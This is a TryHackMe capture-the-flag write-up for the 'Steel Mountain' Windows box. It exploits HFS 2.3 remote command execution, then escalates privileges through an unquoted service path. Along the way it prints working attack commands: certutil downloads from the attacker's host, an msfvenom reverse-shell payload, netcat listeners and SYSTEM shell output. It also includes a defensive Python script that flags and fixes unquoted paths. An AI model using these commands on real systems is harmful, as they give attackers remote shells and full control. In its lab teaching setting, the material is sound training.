
Steel Mountain Writeup [THM]

Steel Mountain is a Windows-themed machine from TryHackMe, based on the Mr. Robot TV series. It consists of exploiting HFS 2.3 to obtain initial access and then running winPEAS to discover and exploit an unquoted service path vulnerability.

Enumeration

Running nmap:

nmap -sC -sV -Pn 10.10.74.246
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 13:27 CEST
Nmap scan report for 10.10.74.246
Host is up (0.051s latency).
Not shown: 983 closed ports
PORT      STATE    SERVICE      VERSION
23/tcp    filtered telnet
80/tcp    filtered http
110/tcp   filtered pop3
113/tcp   filtered ident
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
143/tcp   filtered imap
199/tcp   filtered smux
443/tcp   filtered https
445/tcp   filtered microsoft-ds
995/tcp   filtered pop3s
8080/tcp  filtered http-proxy
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We see there are various ports open; first we are going to focus on the web-related ports, 80 and 8080. Browsing to port 80 we see the following landing page, with nothing relevant:

(Screenshot: Web)

Then on port 8080 we see that the machine is running HttpFileServer 2.3:

(Screenshot: FileServer)

Doing a quick search, we find several exploits, but we will focus on the RCE one corresponding to the following Exploit-DB entry: https://www.exploit-db.com/exploits/39161

searchsploit Http File Server 2.3
----------------------------------------------------------------------------------------- -------------------------
 Exploit Title                                                                           |  Path
----------------------------------------------------------------------------------------- -------------------------
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                           | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                      | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                      | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                 | windows/webapps/34852.txt
----------------------------------------------------------------------------------------- -------------------------

Exploitation

In order to obtain a reverse shell by running the RCE exploit, we need to host a web server that serves netcat for the exploit to fetch; we can do this with Python:

python -m SimpleHTTPServer 80

Running the exploit:

python 39161.py 10.10.74.246 8080

After running it, we check netcat and obtain a reverse shell as bill:

nc -lvnp 443
listening on [any] 443 ...
connect to [10.11.14.106] from (UNKNOWN) [10.10.74.246] 49362
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>whoami
steelmountain\bill

Privilege Escalation

For this part we are going to use an enumeration tool called winPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS. As we previously hosted a web server on port 80 with Python, we can download winPEAS onto the victim machine through certutil.exe:

C:\tmp>certutil.exe -urlcache -split -f http://10.11.14.106:80/winPEAS.exe
****  Online  ****
  000000  ...
  072a00
CertUtil: -URLCache command completed successfully.

Running winPEAS, we find the following lines among its output:

AdvancedSystemCareService9(IObit - Advanced SystemCare Service 9)[C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe] - Auto - Running - No quotes and Space detected
File Permissions: bill[WriteDataCreateFile]

This service path is unquoted and contains spaces, which can lead to an unquoted service path vulnerability; furthermore, we have write permission in that directory.

Checking Exploit-DB, we find an entry related to that service: https://www.exploit-db.com/exploits/40577

In order to exploit this vulnerability we need to upload our payload into C:\Program Files (x86)\IObit\ as Advanced.exe, so that Windows resolves and executes it before reaching the real ASCService.exe inside Advanced SystemCare\.
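To make the resolution order concrete from a defender's side, here is an added Python example (not part of the original writeup, and not winPEAS code) that parses winPEAS-style service lines, lists the paths the service control manager would try for an unquoted ImagePath with spaces, and emits the `sc config` command that quotes the path to remove the ambiguity. The sample lines are constructed to approximate the output quoted above.

```python
import re

# Constructed sample lines in the style of winPEAS' services check (not real tool
# output); the first mirrors the writeup's finding, the other two are benign controls.
SAMPLE_LINES = [
    "AdvancedSystemCareService9(IObit - Advanced SystemCare Service 9)"
    "[C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\ASCService.exe]"
    " - Auto - Running - No quotes and Space detected",
    "Spooler(Print Spooler)[C:\\Windows\\System32\\spoolsv.exe] - Auto - Running",
    "Quoted(Quoted Service)[\"C:\\Program Files\\Vendor App\\svc.exe\"] - Auto - Stopped",
]

def parse_winpeas_service(line):
    """Return (service_name, image_path) from a winPEAS-style line, else None."""
    m = re.match(r"^([^(]+)\(.*?\)\[(.+?)\]", line)
    return (m.group(1), m.group(2)) if m else None

def unquoted_candidates(image_path):
    """Paths CreateProcess tries, in order, for an unquoted ImagePath with spaces.
    Each space may end the executable name; '.exe' is appended to prefixes that lack
    an extension. Quoted paths or paths without spaces are unambiguous -> []."""
    if image_path.startswith('"') or " " not in image_path:
        return []
    parts = image_path.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    return candidates

def quoted_fix(service_name, image_path):
    """sc.exe command that rewrites the binary path with surrounding quotes."""
    return f'sc config {service_name} binPath= "\\"{image_path}\\""'

def find_unquoted(lines):
    """Map each vulnerable service name to (image_path, candidate paths)."""
    findings = {}
    for line in lines:
        parsed = parse_winpeas_service(line)
        if parsed and unquoted_candidates(parsed[1]):
            findings[parsed[0]] = (parsed[1], unquoted_candidates(parsed[1]))
    return findings

if __name__ == "__main__":
    for name, (path, cands) in find_unquoted(SAMPLE_LINES).items():
        print(name)
        for c in cands[:-1]:  # every entry before the real binary is a hijack point
            print("  would try:", c)
        print("  fix:", quoted_fix(name, path))
```

Every candidate before the real binary is a location to audit for write access by non-administrators; quoting the path (or tightening the directory ACLs) closes the issue.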

Generating the payload with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.14.106 LPORT=4444 -fexe -o Advanced.exe

Uploading it to the victim with certutil:

certutil.exe -urlcache -split -f http://10.11.14.106:80/Advanced.exe

Finally we only need to restart AdvancedSystemCareService9:

sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9

After restarting it, a reverse shell as nt authority\system is obtained:

nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.11.14.106] from (UNKNOWN) [10.10.232.99] 49210
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
This post is licensed under CC BY 4.0 by the author.